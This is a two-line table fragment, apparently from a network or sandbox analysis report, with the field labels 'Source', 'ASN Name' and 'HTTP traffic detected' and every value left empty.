| Source: | ASN Name: | ||
| Source: | HTTP traffic detected: | ||